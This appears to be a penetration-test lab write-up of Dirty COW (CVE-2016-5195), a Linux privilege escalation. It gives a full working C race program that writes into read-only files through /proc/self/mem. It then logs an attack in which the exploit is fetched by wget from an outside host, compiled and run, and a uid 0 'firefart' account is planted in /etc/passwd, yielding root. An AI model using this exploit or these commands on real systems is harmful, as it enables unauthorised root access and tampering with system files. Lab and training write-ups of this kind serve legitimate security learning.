CVE-2016-5195
PEAS has identified that the target system is vulnerable to CVE-2016-5195
A vulnerability was found in the Linux kernel from 2.6.22 up to 4.8.2 (fixed upstream in 4.8.3; distribution kernels carry backported fixes, so the version string alone does not settle whether a host is affected). It has been rated as critical. The flaw is a race condition in the kernel memory subsystem's copy-on-write handling of private file mappings (Dirty COW, CVE-2016-5195): by racing a forced write into a MAP_PRIVATE mapping of a read-only file (through /proc/self/mem or ptrace) against madvise(MADV_DONTNEED) on the same pages, a local unprivileged user can modify files they are only allowed to read. The attack is launched on the local host and needs no special privileges, and working exploits are public. This vulnerability has a historic impact due to its background and reception. It is recommended to upgrade the affected component.
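The race described above can be exercised without touching a system file, which is the check worth running before trusting a version-based scanner result or dropping a public exploit on a host. The probe below is an added example, not code from this page nor from the exploit used later: it creates a throwaway read-only file, maps it PROT_READ and MAP_PRIVATE, and races writes through /proc/self/mem (the kernel forces these into the private copy-on-write page) against madvise(MADV_DONTNEED) on the same mapping. On a vulnerable kernel some writes land in the page cache and the file on disk changes; on a patched kernel it never does. The file path, payload, iteration count and function names are assumptions of this example.

```c
#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* State shared by the two racing threads. */
struct probe {
    void *map;            /* PROT_READ, MAP_PRIVATE mapping of the target file */
    size_t len;           /* mapping length */
    const char *payload;  /* bytes we try to push through to the file */
    long iterations;      /* bounded so the probe always terminates */
    volatile int stop;    /* set by whichever thread finishes or fails first */
};

/* Create the throwaway target (assumed path chosen by the caller): a small
 * file made read-only (0444). Returns 0 on success, -1 on error. */
int make_probe_file(const char *path, const char *contents)
{
    unlink(path);  /* a stale 0444 copy from an earlier run would block O_TRUNC */
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    size_t n = strlen(contents);
    int ok = write(fd, contents, n) == (ssize_t)n;
    close(fd);
    if (!ok) return -1;
    return chmod(path, 0444);
}

/* Does the file on disk now begin with `prefix`? Returns 1/0, -1 on error. */
int file_starts_with(const char *path, const char *prefix)
{
    char buf[256];
    size_t n = strlen(prefix);
    if (n >= sizeof buf) return -1;
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    ssize_t got = read(fd, buf, n);
    close(fd);
    if (got != (ssize_t)n) return -1;
    return memcmp(buf, prefix, n) == 0;
}

/* Thread 1: keep discarding the private COW copy so every write must fault again. */
static void *madvise_thread(void *arg)
{
    struct probe *p = arg;
    for (long i = 0; i < p->iterations && !p->stop; i++)
        madvise(p->map, p->len, MADV_DONTNEED);
    p->stop = 1;
    return NULL;
}

/* Thread 2: write through /proc/self/mem at the mapping address. The kernel
 * forces the write (FOLL_FORCE) into what should be a private copy; on a
 * vulnerable kernel the race with MADV_DONTNEED lets it hit the page cache. */
static void *procselfmem_thread(void *arg)
{
    struct probe *p = arg;
    size_t n = strlen(p->payload);
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0) { p->stop = 1; return NULL; }
    for (long i = 0; i < p->iterations && !p->stop; i++) {
        if (lseek(fd, (off_t)(uintptr_t)p->map, SEEK_SET) < 0 ||
            write(fd, p->payload, n) != (ssize_t)n)
            break;  /* e.g. a sandbox that refuses /proc/self/mem writes */
    }
    close(fd);
    p->stop = 1;
    return NULL;
}

/* Run the race against `path`. Returns 1 if `payload` reached the file on disk
 * (kernel vulnerable), 0 if the file is untouched, -1 on setup error. */
int dirtycow_probe(const char *path, const char *payload, long iterations)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || (size_t)st.st_size < strlen(payload)) { close(fd); return -1; }
    void *map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    close(fd);
    if (map == MAP_FAILED) return -1;

    struct probe p = { map, (size_t)st.st_size, payload, iterations, 0 };
    pthread_t t_madvise, t_write;
    if (pthread_create(&t_madvise, NULL, madvise_thread, &p) != 0) { munmap(map, st.st_size); return -1; }
    if (pthread_create(&t_write, NULL, procselfmem_thread, &p) != 0) {
        p.stop = 1; pthread_join(t_madvise, NULL); munmap(map, st.st_size); return -1;
    }
    pthread_join(t_write, NULL);
    pthread_join(t_madvise, NULL);
    munmap(map, st.st_size);
    return file_starts_with(path, payload);  /* only a won race changes the file */
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/tmp/dirtycow_probe.txt";  /* assumed scratch path */
    if (make_probe_file(path, "this line must survive the probe\n") != 0) { perror("make_probe_file"); return 2; }
    int r = dirtycow_probe(path, "pwned", 2000000);
    printf("%s\n", r == 1 ? "VULNERABLE: payload reached the file on disk"
                 : r == 0 ? "not observed: file unchanged after the race"
                          : "probe could not run");
    unlink(path);
    return r < 0 ? 2 : 0;
}
```

Compile with gcc -pthread. A hit is conclusive; a miss is not proof of a patched kernel, because the window is timing dependent and the loop is bounded, so read it together with the distribution's advisory for the running kernel version. The primitive is the same one the exploit later on this page uses, with ptrace in place of /proc/self/mem and /etc/passwd in place of the scratch file.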
Exploit (DirtyCow)
Exploit found online: judging from the backup message and the firefart account in the output below, this is the firefart variant of dirty.c, which races the copy-on-write fault (madvise thread) against a ptrace write into a private mapping of /etc/passwd to plant a uid 0 user with a password of the attacker's choosing.
Exploitation
www-data@offsecsrv:/var/tmp$ wget -q http://192.168.45.192/dirty.c
Delivery complete
www-data@offsecsrv:/var/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
Compile
www-data@offsecsrv:/var/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: qwe123
Complete line:
firefart:fim3Q/wLL7UY6:0:0:pwned:/root:/bin/bash
mmap: b7745000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'qwe123'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Exploit successful. The new entry has been written over the start of /etc/passwd, i.e. over the original root line, which is why the tool insists on restoring /tmp/passwd.bak once the elevated shell is no longer needed; until then anything that resolves uid 0 by name reports firefart rather than root, as the id output below shows. The race also hammers the page-fault path and can wedge fragile kernels, so keep a way to reboot the target in mind before running it on anything that matters.
www-data@offsecsrv:/var/tmp$ su firefart
Password: qwe123
firefart@offsecsrv:/var/tmp# whoami
firefart
firefart@offsecsrv:/var/tmp# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@offsecsrv:/var/tmp# hostname
offsecsrv
firefart@offsecsrv:/var/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:50:56:9e:20:a7 brd ff:ff:ff:ff:ff:ff
inet 192.168.132.41/24 brd 192.168.132.255 scope global eth0
inet6 fe80::250:56ff:fe9e:20a7/64 scope link
valid_lft forever preferred_lft forever
System level compromise